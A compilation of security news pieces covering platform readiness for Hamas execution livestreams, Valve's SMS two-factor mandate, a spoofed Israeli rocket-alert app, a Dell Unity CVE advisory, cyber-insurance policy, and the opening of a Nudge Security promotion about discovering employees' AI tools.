Hamas has threatened to broadcast videos of hostage executions. With the war between Israel and Hamas poised to enter a new phase, are social platforms ready?

For the past decade, social media platforms have struggled to stop the spread of extremist violence livestreamed on their platforms. Now they face a much different problem: This time, they know what’s coming.

In the days after Hamas attacked Israel on October 7, the group’s military wing said it would kill an Israeli hostage every time Israel launched an attack on Gaza. Abu Obeida, a spokesperson for the al-Qassam Brigades, added that these executions would be broadcast “in audio and video.” As of today, Hamas is holding 220 people hostage, according to the Israel Defense Forces.

Amid the October 7 attack, one person livestreamed footage showing Hamas fighters murdering Israeli citizens—a clip of which was later shared by Donald Trump Jr. on X. And in the days after the attack, Hamas hijacked the accounts of those hostages on platforms like Facebook and Instagram to livestream attacks and issue death threats.

In response, tech companies appeared to take things seriously.

Meta launched a “special operations center” to track content on Facebook, Instagram, and Threads. TikTok activated its “command center.” X (formerly Twitter) mobilized its “cross-company leadership group.” YouTube activated its “intelligence desk.” And Reddit tells WIRED its “safety team” is on alert.

But when WIRED asked for specific details about how they are going to prevent bad actors from weaponizing the platforms’ livestreaming capabilities, none of the companies offered any specific details, instead pointing to their general online guidance about livestreaming policies, if they responded at all. For example, Meta directed WIRED to a 2019 blog post from chief information security officer Guy Rosen about how the company was planning to curb the use of its livestream products in the wake of the Christchurch massacre, during which a gunman killed 51 people at a mosque in New Zealand in March of that year.

Despite the press releases indicating all-hands-on-deck attention to the livestreaming problem, industry experts say social media companies are showing a lack of transparency and an unwillingness to take the measures needed to prevent execution videos from spreading on their platforms, such as suspending livestreaming capabilities completely during the Israel-Hamas war.

“Hamas’ threats to execute these people on livestreams is happening because it’s possible for them to broadcast it,” Imran Ahmed, the founder and CEO of Center for Countering Digital Hate, a nonprofit that tracks hate speech on social platforms, tells WIRED. “They’re doing this for the spectacle because it terrorizes us. If we took away their ability to generate that spectacle, would they be doing this? What comes first, the livestream or the execution?”

Ahmed alleges that the companies are failing to implement systems that automatically detect violent extremist content as effectively as they detect some other kinds of content. “If you have a snatch of copyrighted music in your video, their systems will detect it within a microsecond and take it down,” Ahmed says, adding that “the fundamental human rights of the victims of terrorist attacks” should carry as much urgency as the “property rights of music artists and entertainers.”

The lack of details about how social platforms plan to curb the use of livestreams is, in part, because they are concerned about giving away too much information, which may allow Hamas, Palestinian Islamic Jihad (PIJ), and other militant groups or their supporters to circumvent the measures that are in place, an employee of a major platform who was granted anonymity because they are not authorized to speak publicly claimed in a communication with WIRED.

Adam Hadley, founder and executive director of Tech Against Terrorism, a United Nations-affiliated nonprofit that tracks extremist activity online, tells WIRED that while maintaining secrecy around content moderation methods is important during a sensitive and volatile conflict, tech companies should be more transparent about how they work.

“There has to be some degree of caution in terms of sharing the details of how this material is discovered and analyzed,” Hadley says. “But I would hope there are ways of communicating this ethically that don’t tip off terrorists to detection methods, and we would always encourage platforms to be transparent about what they’re doing.”

The social media companies say their dedicated teams are working around the clock right now as they await the launch of Israel’s expected ground assault in Gaza, which Hadley believes could trigger a spate of hostage executions.

And yet, for all of the time, money, and resources these multibillion-dollar companies appear to be putting into tackling this potential crisis, they are still reliant on Tech Against Terrorism, a tiny nonprofit, to alert them when new content from Hamas or PIJ, another paramilitary group based in Gaza, is posted online.

Hadley says his team of 20 typically knows about new terrorist content before any of the big platforms. So far, while tracking verified content from Hamas’ military wing or the PIJ, Hadey says the volume of content on the major social platforms is “very low.”

“Examples that we can find on large platforms of that official content are in the thousands, so not a lot of examples, compared with significantly more on Telegram,” Hadley says. “We are sharing alerts to 60 platforms who have been implicated with \[Hamas\] and PIJ content to date, but very low volumes are present.”

Hamas is banned on Facebook, Instagram, YouTube, and TikTok, so it has typically not used these mainstream platforms to any great extent, though X said earlier this month that it had removed hundreds of Hamas-affiliated accounts. Instead, Hamas prefers to use Telegram.

“Because the use of Telegram is so widespread and simple, we will assume they will continue to do this because terrorists prioritize platforms they can use most easily,” Hadley says, “and why would they bother with anything other than Telegram?”

Meta, X, and YouTube collaborate to share information about what they are seeing on the platforms. Telegram does not take part in such partnerships. While it has blocked some channels in certain jurisdictions, Telegram has typically taken a hands-off approach to content moderation, meaning Hamas and related groups have been mostly free to post whatever content they like on its platform.

Telegram did not respond to WIRED’s questions about how it would deal with execution videos on its platform, nor did X or Twitch. Discord declined to provide an on-the-record comment.

While Hadley sees Telegram as the primary concern, mainstream platforms are still at risk of facilitating the spread of this content. Videos can easily be downloaded from Telegram and reposted on any other platform, which is where the mainstream social media networks face the challenge of stopping them.

When asked to provide more details about their efforts, Meta and TikTok directed WIRED to their policy pages outlining the work they are doing to prevent the spread of these videos. YouTube spokesperson Jack Malon tells WIRED that “our teams are working around the clock to monitor for harmful footage across languages and locales.” A Reddit spokesperson says the company has “dedicated teams with linguistic and subject-matter expertise actively monitoring the conflict and continuing to enforce Reddit’s Content Policy across the site.”

One of the key ways that tech companies try to keep violent extremist content from going viral on their platforms is by using what are known as hashing databases. When content from a terrorist organization is identified, it is “hashed” to create a unique identifier that can then be shared among all companies to automatically prevent that video or image from being reshared elsewhere.

The sharing of these hashes and communication around incidents like the Israel-Hamas war are coordinated by the Global Internet Forum to Counter Terrorism (GIFCT), a small team of experts whose mission is to stop tech platforms from being exploited by violent extremists. The group was founded in 2017 by Facebook, Microsoft, X (then Twitter), and YouTube as a way of centralizing and coordinating the sharing of information. Companies like Dropbox, Amazon, Pinterest, and Zoom also provide funding to the group.

GIFCT did not provide a spokesperson to answer WIRED’s questions, but a statement on the group’s website says it is “providing regular situational awareness across member companies and support in addressing content relating to this conflict that violates their platform policies.”

Even when mainstream platforms have access to a shared database of verified terrorist content and centralized communications with experts who are tracking this content closely, they still have a lot of work to do in order to prevent violent videos from spreading on their platforms.

“This will be a big litmus test for the mainstream platforms,” Hadley says. “We would expect their algorithmic systems to be able to detect the \[Hamas\] logo, for instance, and respond accordingly. So actually, we’re quietly confident that those platforms will be alright to handle it. And I would hope that they’ve been training their algorithms in anticipation of this, based on the very large amounts of existing content from \[Hamas and PIJ\]. But unfortunately, we have no insight into that at all.”

The Hamas Threat of Hostage Execution Videos Looms Large Over Social Media

Despite warnings that sending one-time passwords via text messages is a flawed security measure, companies continue to roll out the approach, especially in consumer-facing applications.

Following a spate of attacks targeting independent developers on its Steam game-distribution platform, game maker Valve last week said that it will require developers to provide their phone numbers so the company can use SMS for two-factor authentication (2FA) starting Oct. 24. 

"As part of a security update, any Steamworks account setting that builds live on the default/public branch of a released app will need to have a phone number associated with their account, so that Steam can text you a confirmation code before continuing," the company stated in its notification. "We also plan on adding this requirement for other Steamworks actions in the future."

But since SMS-based two-factor authentication can be circumvented by persistent attackers using a variety of methods, the move raises the question: Why are consumer-facing online services still making SMS the go-to second factor, both internally and for customers?

**SMS-Based 2FA: Not Really Secure**

Getting around SMS two-factor authentication has become a priority among attackers, and indeed, it has been defeated using everything from machine-in-the-middle attacks to social engineering — including, in the infamous Uber breach case, through 2FA fatigue attacks. 

In 2022, for example, a banking Trojan known as Xenomorph compromised more than 50,000 Android devices after the cybercriminal group behind the malware disguised it as a performance utility, according to Tony Anscombe, chief security evangelist for digital security firm ESET.

"In reality, it was stealing the user’s login credentials for banking, payment, social media, cryptocurrency and other apps that have valuable personal information," he says. "The malware abused more than 50 apps, including PayPal and Coinbase, and included the ability to intercept messages and notifications, giving the cybercriminal the ability to bypass two-factor authentication codes.

But even the low-tech approach of just walking into a cellular store (SIM-swapping) or finding a corrupt technician works well, says David Richardson, vice president of endpoint and threat intelligence at cloud security platform Lookout. All an attacker has to do is know the targeted individual's phone number to attack the channel.

"The whole system is basically built on an assumption of trust — I could walk into any store and easily cancel my contract and port my phone number ... to pretty much any carrier," he says. "Basically \[an attacker could\] take over any phone number and start to receive the phone calls and, most importantly in these cases, the SMS messages that are that are going to those to those numbers."

And cellphone numbers are some of the most commonly leaked information on the Internet. The recent compromises of MGM Resorts and Caesars Entertainment, for example, exposed millions of records of business professionals and individual consumers, including phone numbers, which could be used by attackers for further attacks. 

**2FA Is Better Than Nothing**

SMS-based 2FA persists in the face of the insecurity for the simple reason that it's a relatively painless security mechanism for end users: A company merely needs to know is the customer's phone number to text a one-time passcode for authentication. For consumer-facing companies, reducing friction is the name of the game.

At the same time, making attackers' jobs even just a little bit more difficult helps protect developers — and the players of their games.

"Any MFA is better than no MFA — like, vastly superior," Lookout's Richardson says. "You're 10 times harder to hack if you've got an SMS-based MFA, so ... you're way better off having some form of multifactor authentication versus no form of multifactor authentication."

An SMS code could have protected Benoît Freslon, the independent developer behind the game NanoWar: Cells VS Virus, for example. Freslon fell prey to a social engineering scam, apparently when cybercriminals posing as another developer sent him a direct message with malicious content, according to a statement posted on Steam's Community forums.

"I was hacked, all my social networks accounts including Discord and Steam were compromised ... \[t\]he hacker uploaded a malware with \[sic\] my account," a developer stated on Steam's forums. "Be careful when a friend ask you to test his game on private message on Discord. ... It was the most stressfull days \[sic\] of my indie developer life."

Valve removed the game from Steam on Aug. 25, a day after the group behind the hacks published the infected version from the developer's account. The game developer stressed that a safe version of the game has been available since Sept. 15, uploaded from a "totally clean machine."

**SMS: A Good First Step, but...**

Companies focused on consumers and worried that the additional friction posed by 2FA security could use app-based factors that are already widely adopted, such as Google's or Microsoft's authenticators, says ESET's Anscombe.

"Many consumer-focused companies already provide the option to use either Microsoft or Google authenticator apps, this reduces the barrier to adoption as consumers may already have these apps installed," he says. 

"An app is not subject to SIM cloning nor malware that uses the operating systems permissions system to read SMS messages," he says. "The app itself should be protected by a passkey or biometrics adding an additional layer of security."

Boosting security has become important for game companies, as users have more digital in-game assets stored in online accounts that cybercriminals aim to monetize, and while cheaters look to access other gamers' accounts to gain advantage. Steam expects to roll out more security measures in the future to better protect, not only the developers but its customers and reputation.

Valve's 2FA Mandate for Game Developers Shows SMS Stickiness

A spoofed version of an Israeli rocket-attack alerting app is targeting Android devices, in a campaign that shows how cyber-espionage attacks are shifting to individual, everyday citizens.

Using a trending item as a malicious lure is relatively common; to do it in a period of military conflict and deliberately target users in the affected region is a different step.

Recently, a genuine app — RedAlert - Rocket Alerts — has been popular among users in the Israel and Gaza region, since it allows individuals to receive timely and precise alerts about incoming airstrikes. However, a malicious, spoofed version of the app was detected last week, which collected personal information including access to contacts, call logs, SMS, account information, and an overview of other installed apps.

This and the discovery of a similar incident indicates that unfortunately, the Israel-Hamas conflict's cybercrimes will extend beyond nation-state attacks on critical infrastructure — and into the palm of the user's hand.

**The Initial Malicious App**

According to the discovery by Cloudflare, the website hosting the malicious file was created on Oct. 12, and it has been taken offline since. Only those users who installed the Android version of the app are impacted, and they are urgently advised to delete the app.

A statement from Cloudflare said it became aware of a website hosting a Google Android Application that impersonated the legitimate RedAlert - Rocket Alerts application. "Given the current climate in Israel, this application is heavily relied upon by individuals living in the country to be notified when it is critical to seek safety," it said.

The creation of a malicious app spoofing a known brand is common, according to a recent report from Arctic Wolf, which said malicious apps found in official app stores are often disguised with the use of names, images, or descriptions similar to popular or malware-free apps. They also may have fake reviews to help increase the malicious app's rating and to make them look more realistic.

But in this case, the malicious application mimicked a widely used app to steal data, in what Cloudflare called "a time of distress" where services such as this are replied upon, adding that this is "another example of threat attackers leveraging authenticity to carry out impactful attacks."

Casey Ellis, founder and CTO of Bugcrowd, says he does expect to see more cases like this where the Gaza conflict is used as a malware lure — both regionally and globally.

"Attackers are always on the lookout for events that create fear, uncertainty, and a volatile information environment, and the Israel-Hamas conflict definitely meets these criteria," he says.

Cloudflare was unable to add attribution to whoever was behind this malicious app, and there is no evidence that this was even a threat actor from the Middle East. So this could be the work of an unrelated cybercriminal looking to use the conflict for their malicious gain.

**More Than One Incident**

In a separate detection, Cloudflare said the pro-Palestinian hacktivist group AnonGhost exploited a vulnerability in another application, Red Alert: Israel. This allowed the group to intercept requests, expose servers and APIs, and send fake alerts to some app users, including a message that a nuclear bomb strike was imminent.

In its detection of that incident, Group-IB Threat Intelligence said this shows that the actions of attackers can be diverse, as hacktivists are generally associated with conducting small-scale DDoS attacks and defacement. But as the ongoing conflict shows, sometimes their actions can be far more devastating and costly, and "it's essential to map and properly mitigate the risk of hacktivism as part of a threat intelligence program."

Krishna Vishnubhotla, vice president of product strategy at Zimperium, says spoofing mobile apps is easy, as many app teams are inadvertently giving threat actors a blueprint for abuse.

He says, "App teams focus on code optimization and speed to market, but never ensure sufficient threat visibility and protection for their apps once they are published. Threat actors know this and use reverse engineering to truly understand an app's inner workings."

Vishnubhotla adds, "Knowing an application's architecture, data flow, and security mechanisms allows a hacker to easily create spoofed apps."

**Be Careful With Clicks**

The advice to avoid becoming victimized by these types of attacks is fairly straightforward. Arctic Wolf recommend checking the app's developers and reviews, restricting permissions when necessary; users should download apps only from reputable developers and look for mentions of scams or malicious activity mentioned in reviews by other users.

The advice from Group-IB was for organizations to carefully examine and fortify all Web-facing applications, as "it's not uncommon for hacktivists to exploit web and mobile APIs, often perceived as softer targets compared to the principal product APIs."

Ellis admits his advice on protection from malicious apps — saying users should trust, but verify — is nothing groundbreaking, but it persists for a reason.

"Double-check before you trust anything that offers to assist you in issues of personal safety, and triple-check before you share it with others," he says. He acknowledges that in this case, the malicious apps were downloaded by people in a state of concern and potentially without the due consideration they would usually give to vetting them.

Malicious Apps Spoof Israeli Attack Detectors: Conflict Goes Mobile


Dell Unity 5.3 contain(s) an Arbitrary File Creation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by crafting arbitrary files through a request to the server.



**Impact**

Critical

**Details**

Third-party Component

CVEs

More information

open-vm-tools

CVE-2022-31676

https://www.suse.com/security/cve/CVE-2022-31676.html

postgresql-jdbc

CVE-2022-41946

https://www.suse.com/security/cve/CVE-2022-41946.html

bind

CVE-2021-25220

https://www.suse.com/security/cve/CVE-2021-25220.html

libstdc

CVE-2020-13844, CVE-2019-15847, CVE-2019-14250

https://www.suse.com/security/cve/CVE-2020-13844.html, https://www.suse.com/security/cve/CVE-2019-15847.html, https://www.suse.com/security/cve/CVE-2019-14250.html

ntp

CVE-2020-15025, CVE-2020-13817, CVE-2018-8956, CVE-2020-11868

https://www.suse.com/security/cve/CVE-2020-15025.html, https://www.suse.com/security/cve/CVE-2020-13817.html, https://www.suse.com/security/cve/CVE-2018-8956.html, https://www.suse.com/security/cve/CVE-2020-11868.html

runc

CVE-2022-31030, CVE-2022-29162

https://www.suse.com/security/cve/CVE-2022-31030.html, https://www.suse.com/security/cve/CVE-2022-29162.html

sysstat

CVE-2019-16167, CVE-2018-19517, CVE-2018-19416

https://www.suse.com/security/cve/CVE-2019-16167.html, https://www.suse.com/security/cve/CVE-2018-19517.html, https://www.suse.com/security/cve/CVE-2018-19416.html

cpio

CVE-2021-38185

https://www.suse.com/security/cve/CVE-2021-38185.html

dnsmasq

CVE-2020-25687, CVE-2020-25686, CVE-2020-25682, CVE-2020-25681, CVE-2020-25685, CVE-2020-25684, CVE-2020-25683, CVE-2022-0934, CVE-2021-3448

https://www.suse.com/security/cve/CVE-2020-25687.html, https://www.suse.com/security/cve/CVE-2020-25686.html, https://www.suse.com/security/cve/CVE-2020-25682.html, https://www.suse.com/security/cve/CVE-2020-25681.html, https://www.suse.com/security/cve/CVE-2020-25685.html, https://www.suse.com/security/cve/CVE-2020-25684.html, https://www.suse.com/security/cve/CVE-2020-25683.html, https://www.suse.com/security/cve/CVE-2022-0934.html, https://www.suse.com/security/cve/CVE-2021-3448.html

git

CVE-2022-29187, CVE-2022-24765

https://www.suse.com/security/cve/CVE-2022-29187.html, https://www.suse.com/security/cve/CVE-2022-24765.html

krb5

CVE-2021-3672

https://www.suse.com/security/cve/CVE-2021-3672.html

Dbus

CVE-2020-35512, CVE-2020-12049

https://www.suse.com/security/cve/CVE-2020-35512.html, https://www.suse.com/security/cve/CVE-2020-12049.html

mozilla

CVE-2022-31741, CVE-2015-20107, CVE-2021-3572, CVE-2020-26116, CVE-2019-11324, CVE-2019-11236, CVE-2019-9740, CVE-2018-20060, CVE-2018-18074

https://www.suse.com/security/cve/CVE-2022-31741.html, https://www.suse.com/security/cve/CVE-2015-20107.html, https://www.suse.com/security/cve/CVE-2021-3572.html, https://www.suse.com/security/cve/CVE-2020-26116.html, https://www.suse.com/security/cve/CVE-2019-11324.html, https://www.suse.com/security/cve/CVE-2019-11236.html, https://www.suse.com/security/cve/CVE-2019-9740.html, https://www.suse.com/security/cve/CVE-2018-20060.html, https://www.suse.com/security/cve/CVE-2018-18074.html

root user

CVE-2019-5021

https://www.suse.com/security/cve/CVE-2019-5021.html

xstream

CVE-2021-21342

https://www.suse.com/security/cve/CVE-2021-21342.html

dom4j

CVE-2020-10683

https://www.suse.com/security/cve/CVE-2020-10683.html

vim

CVE-2021-3973

https://www.suse.com/security/cve/CVE-2021-3973.html

tomcat

CVE-2022-25762, CVE-2022-23181

https://www.suse.com/security/cve/CVE-2022-25762.html, https://www.suse.com/security/cve/CVE-2022-23181.html

apache2

CVE-2022-26373, CVE-2022-26377, CVE-2022-28614, CVE-2022-28615, CVE-2022-29404, CVE-2022-30522, CVE-2022-31813, CVE-2022-30556

https://www.suse.com/security/cve/CVE-2022-26373.html, https://www.suse.com/security/cve/CVE-2022-26377.html, https://www.suse.com/security/cve/CVE-2022-28614.html, https://www.suse.com/security/cve/CVE-2022-28615.html, https://www.suse.com/security/cve/CVE-2022-29404.html, https://www.suse.com/security/cve/CVE-2022-30522.html, https://www.suse.com/security/cve/CVE-2022-31813.html, https://www.suse.com/security/cve/CVE-2022-30556.html

libopenssl-1\_1

CVE-2022-1292

https://www.suse.com/security/cve/CVE-2022-1292.html

avahi

CVE-2021-26720, CVE-2021-3468

https://www.suse.com/security/cve/CVE-2021-26720.html   , https://www.suse.com/security/cve/CVE-2021-3468.html

Libgcrypt

CVE-2021-33560

https://www.suse.com/security/cve/CVE-2021-33560.html

Libnettle

CVE-2021-3580

https://www.suse.com/security/cve/CVE-2021-3580.html

pcre2

CVE-2022-1587, CVE-2019-20454

https://www.suse.com/security/cve/CVE-2022-1587.html, https://www.suse.com/security/cve/CVE-2019-20454.html

Cyrus

CVE-2022-24407

https://www.suse.com/security/cve/CVE-2022-24407.html

libopenssl-1\_1

CVE-2022-2097, CVE-2022-2068

https://www.suse.com/security/cve/CVE-2022-2097.html, https://www.suse.com/security/cve/CVE-2022-2068.html

apache-commons-httpclient

CVE-2020-13956

https://www.suse.com/security/cve/CVE-2020-13956.html

openssh

CVE-2021-41617

https://www.suse.com/security/cve/CVE-2021-41617.html

e2fsprogs

CVE-2022-1304

https://www.suse.com/security/cve/CVE-2022-1304.html

containerd, docker

CVE-2021-43565, CVE-2022-27191, CVE-2022-24769, CVE-2022-23648

https://www.suse.com/security/cve/CVE-2021-43565.html, https://www.suse.com/security/cve/CVE-2022-27191.html, https://www.suse.com/security/cve/CVE-2022-24769.html, https://www.suse.com/security/cve/CVE-2022-23648.html

ucode-intel

CVE-2022-21151  

https://www.suse.com/security/cve/CVE-2022-21151.html

openjdk

CVE-2022-21476, CVE-2022-21426, CVE-2022-21496, CVE-2022-21496, CVE-2022-21434, CVE-2022-21443

https://www.suse.com/security/cve/CVE-2022-21476.html, https://www.suse.com/security/cve/CVE-2022-21426.html, https://www.suse.com/security/cve/CVE-2022-21496.html, https://www.suse.com/security/cve/CVE-2022-21496.html, https://www.suse.com/security/cve/CVE-2022-21434.html, https://www.suse.com/security/cve/CVE-2022-21443.html

tiff

CVE-2022-0909, CVE-2022-0908, CVE-2022-0562, CVE-2022-0561, CVE-2022-0891, CVE-2022-0865, CVE-2022-1056, CVE-2022-0924

https://www.suse.com/security/cve/CVE-2022-0909.html, https://www.suse.com/security/cve/CVE-2022-0908.html, https://www.suse.com/security/cve/CVE-2022-0562.html, https://www.suse.com/security/cve/CVE-2022-0561.html, https://www.suse.com/security/cve/CVE-2022-0891.html, https://www.suse.com/security/cve/CVE-2022-0865.html, https://www.suse.com/security/cve/CVE-2022-1056.html, https://www.suse.com/security/cve/CVE-2022-0924.html

gzip, xz

CVE-2022-1271

https://www.suse.com/security/cve/CVE-2022-1271.html

mozilla-nss

CVE-2022-1097

https://www.suse.com/security/cve/CVE-2022-1097.html

util-linux

CVE-2021-37600

https://www.suse.com/security/cve/CVE-2021-37600.html

OpenSSL

CVE-2022-0778

https://www.suse.com/security/cve/CVE-2022-0778.html

fbindglibc

CVE-2021-3999, CVE-2022-23218, CVE-2022-23219, CVE-2015-8985

https://www.suse.com/security/cve/CVE-2021-3999.html, https://www.suse.com/security/cve/CVE-2022-23218.html, https://www.suse.com/security/cve/CVE-2022-23219.html, https://www.suse.com/security/cve/CVE-2015-8985.html

libxml2

CVE-2022-23308

https://www.suse.com/security/cve/CVE-2022-23308.html

binutils

CVE-2020-16591, CVE-2020-16599, CVE-2020-16598, CVE-2020-16592, CVE-2020-16593, CVE-2020-16590, CVE-2020-35448, CVE-2020-35496, CVE-2020-35493, CVE-2020-35507, CVE-2021-20197, CVE-2021-20284, CVE-2021-3487, CVE-2021-20294

https://www.suse.com/security/cve/CVE-2020-16591.html, https://www.suse.com/security/cve/CVE-2020-16599.html, https://www.suse.com/security/cve/CVE-2020-16598.html, https://www.suse.com/security/cve/CVE-2020-16592.html, https://www.suse.com/security/cve/CVE-2020-16593.html, https://www.suse.com/security/cve/CVE-2020-16590.html, https://www.suse.com/security/cve/CVE-2020-35448.html, https://www.suse.com/security/cve/CVE-2020-35496.html, https://www.suse.com/security/cve/CVE-2020-35493.html, https://www.suse.com/security/cve/CVE-2020-35507.html, https://www.suse.com/security/cve/CVE-2021-20197.html, https://www.suse.com/security/cve/CVE-2021-20284.html, https://www.suse.com/security/cve/CVE-2021-3487.html, https://www.suse.com/security/cve/CVE-2021-20294.html

pcre

CVE-2020-14155, CVE-2019-20838

https://www.suse.com/security/cve/CVE-2020-14155.html, https://www.suse.com/security/cve/CVE-2019-20838.html

kernel

CVE-2021-4149, CVE-2021-4197, CVE-2021-4202, CVE-2022-0322, CVE-2022-0330, CVE-2022-0435, CVE-2021-44879, CVE-2022-0001, CVE-2022-0002, CVE-2022-0487, CVE-2022-0492, CVE-2022-0617, CVE-2022-0644, CVE-2022-24448, CVE-2022-24959

https://www.suse.com/security/cve/CVE-2021-4149.html, https://www.suse.com/security/cve/CVE-2021-4197.html, https://www.suse.com/security/cve/CVE-2021-4202.html, https://www.suse.com/security/cve/CVE-2022-0322.html, https://www.suse.com/security/cve/CVE-2022-0330.html, https://www.suse.com/security/cve/CVE-2022-0435.html, https://www.suse.com/security/cve/CVE-2021-44879.html, https://www.suse.com/security/cve/CVE-2022-0001.html, https://www.suse.com/security/cve/CVE-2022-0002.html, https://www.suse.com/security/cve/CVE-2022-0487.html, https://www.suse.com/security/cve/CVE-2022-0492.html, https://www.suse.com/security/cve/CVE-2022-0617.html, https://www.suse.com/security/cve/CVE-2022-0644.html, https://www.suse.com/security/cve/CVE-2022-24448.html, https://www.suse.com/security/cve/CVE-2022-24959.html

libcroco

CVE-2020-12825

https://www.suse.com/security/cve/CVE-2020-12825.html

postgresql12

CVE-2021-23222, CVE-2021-23214

https://www.suse.com/security/cve/CVE-2021-23222.html, https://www.suse.com/security/cve/CVE-2021-23214.html

git

CVE-2021-40330

https://www.suse.com/security/cve/CVE-2021-40330.html

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

   

Product

Affected Versions

Remediated Versions

Link

Dell Unity Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers 

Dell UnityVSA Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

Dell Unity XT Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

   

Product

Affected Versions

Remediated Versions

Link

Dell Unity Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers 

Dell UnityVSA Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

Dell Unity XT Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

**Revision History**

Revision

Date

Description

1.0

2023-05-08

Initial Release

2.0

2023-09-01

Updated for enhanced presentation with no changes to content.

3.0

2023-01-23

Added 4 new CVEs, CVE-2023-43074, CVE-2023-43065, CVE-2023-43066, CVE-2023-43067 under "PROPRIERTARY CODE" section 

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Dell EMC Unity, Dell Unity 300, Dell EMC Unity 300F, Dell EMC Unity 350F, Dell EMC Unity 400, Dell EMC Unity 400F, Dell Unity Operating Environment (OE), Dell EMC UnityVSA (Virtual Storage Appliance) , Dell EMC UnityVSA Professional Edition/Unity Cloud Edition ...

CVE-2023-43074: DSA-2023-141: Dell Unity, Unity VSA and Unity XT Security Update for Multiple Vulnerability

To protect themselves from threats, companies also need proactive cybersecurity.

The Federal Trade Commission (FTC) and the National Association of Insurance Commissioners (NAIC) have issued guidance suggesting companies consider cyber insurance as a means of resilience against cyberattacks. While essential, merely suggesting cyber insurance isn't enough. The government must ensure its availability and affordability, especially for small businesses. Businesses must also take other steps to prevent cyber-risks and keep policies affordable. 

The digital age brings immense benefits, but with it comes increased cyber threats to businesses. The solution isn't just insurance — it's proactive cybersecurity.

Businesses should consider cyber insurance a risk management tool, but it's not a comprehensive solution to all cybersecurity challenges. It also may be beyond some small businesses' financial means, and the cost is increasing. According to NAIC, cyber-insurance premiums grew 61% in 2021 alone, when the average annual cost for cyber insurance for a business with $1 million in revenue to have $1 million in coverage (with a $10,000 deductible) was $1,485. The prices have since increased, and some businesses find insurers unwilling to renew policies or even cancelling them. 

Even for businesses that can get — and afford — cyber insurance, it isn't comprehensive and doesn't cover every possible type of security breach. Instead, policies cover a set of named perils. An inexperienced buyer may not realize the protection limitations, given the variety of coverages, exceptions, and exclusions in policies. Policies, for example, may not cover cyber terrorism, state-sponsored attacks, contractual liabilities, or intellectual property infringement, and may have exclusions for war, terrorism, bodily injury, and property damage. Policies may also have deductibles, co-payments, and sublimits that reduce the amount of coverage. 

**How Agencies Can Help**

A recommendation to invest in cyber insurance is excellent, even if it doesn't protect against all threats. However, businesses must be able to afford and obtain it to follow the recommendation. Agencies can increase and expedite cyber-insurance adoption — and general business cyber protection — by implementing a holistic approach that supports businesses' use of proactive cybersecurity measures, provides education, and encourages industry and policy cost subsidization.

The cyber-insurance market lacks standardization, with companies offering policies that cannot be readily compared. This creates challenges for consumers and brokers alike when trying to evaluate policies. A standardized format for presenting policies, perhaps patterned on the 100/300/100 approach used for auto insurance or the energy facts labels used on appliances, could aid consumers in making informed purchase decisions. Agencies can offer incentives to encourage industry self-regulation to promote consistent policy presentation and clarity. This can benefit insurers, underwriters, brokers, and policyholders alike.

**Government Should Subsidize Cyber Insurance**

The government can also aid in cyber-insurance uptake through targeted subsidization. Uninsured businesses create harms that are transferred to the public if they fail after an incident. Companies are also faced with threats from state actors and state-affiliated attackers, which are, rightly, costs borne by the government. Agencies can promote cyber insurance and offer incentives, such as tax credits, for purchasing it. Federal and state governments can aid in policy affordability by creating a backstop fund to cover catastrophic cyber-incident costs, which may cause insurers to fail, and incidents attributable to state actors and state-affiliated attackers. State-backed models exist for other catastrophic risks, like hurricanes and floods. The federal government has also provided airlines with terrorism coverage after incidents. 

Government outreach to businesses can help them understand the importance and implementation of good cybersecurity practices. This will help keep losses and, in turn, policy premiums low. It also prevents incidents from occurring, benefiting society at large. 

Regulators can increase market efficiency by ensuring policies provide the implied coverage. Existing fair-trading authorities can be leveraged to this end. Common policy benefits presentation, and ensuring its accurate translation into policy language facilitates competition and reduces the effort required to compare and purchase policies. Agencies can enable this by developing curriculum and licensing practices targeted at cyber-insurance providers and resellers. 

Government agencies can aid insurance uptake through targeted actions and provide public benefit. Implementing these actions should be a top priority for relevant agencies.

Telling Small Businesses to Buy Cyber Insurance Isn't Enough

With the record-setting growth of consumer-focused AI productivity tools like ChatGPT, artificial intelligence—formerly the realm of data science and engineering teams—has become a resource available to every employee. 
From a productivity perspective, that’s fantastic. Unfortunately for IT and security teams, it also means you may have hundreds of people in your organization using a new tool in

With the record-setting growth of consumer-focused AI productivity tools like ChatGPT, artificial intelligence—formerly the realm of data science and engineering teams—has become a resource available to every employee.

From a productivity perspective, that's fantastic. Unfortunately for IT and security teams, it also means you may have hundreds of people in your organization using a new tool in a matter of days, with no visibility of what type of data they're sending to that tool or how secure it might be. And because many of these tools are free or offer free trials, there's no barrier to entry and no way of discovering them through procurement or expense reports.

Organizations need to understand and (quickly) evaluate the benefits and risks of AI productivity tools in order to create a scalable, enforceable, and reasonable policy to guide their employees' behavior.

****How Nudge Security can help****

Nudge Security discovers all generative AI accounts ever created by any employee, and alerts you as new AI apps are introduced, so you can gain visibility into who's using what, and guide employees towards best practices to mitigate AI security risks.

With Nudge Security, you can:

*   Discover and inventory the AI tools your employees are using
*   Get alerted when new AI tools are introduced
*   Accelerate security reviews to evaluate unfamiliar tools
*   Detect overly permissive OAuth scopes that could endanger corporate data
*   Nudge employees towards approved providers and better security practices
*   Share acceptable use guidance and collect policy acknowledgement

****1\. Get visibility of the AI tools your employees are using, from Day 1.****

Given the explosive growth of tools like ChatGPT, your employees are most likely already using or experimenting with some type of AI product at work. To understand the role AI tools play for your organization, you need to know what's already out there and stay on top of new tools as employees sign up for them.

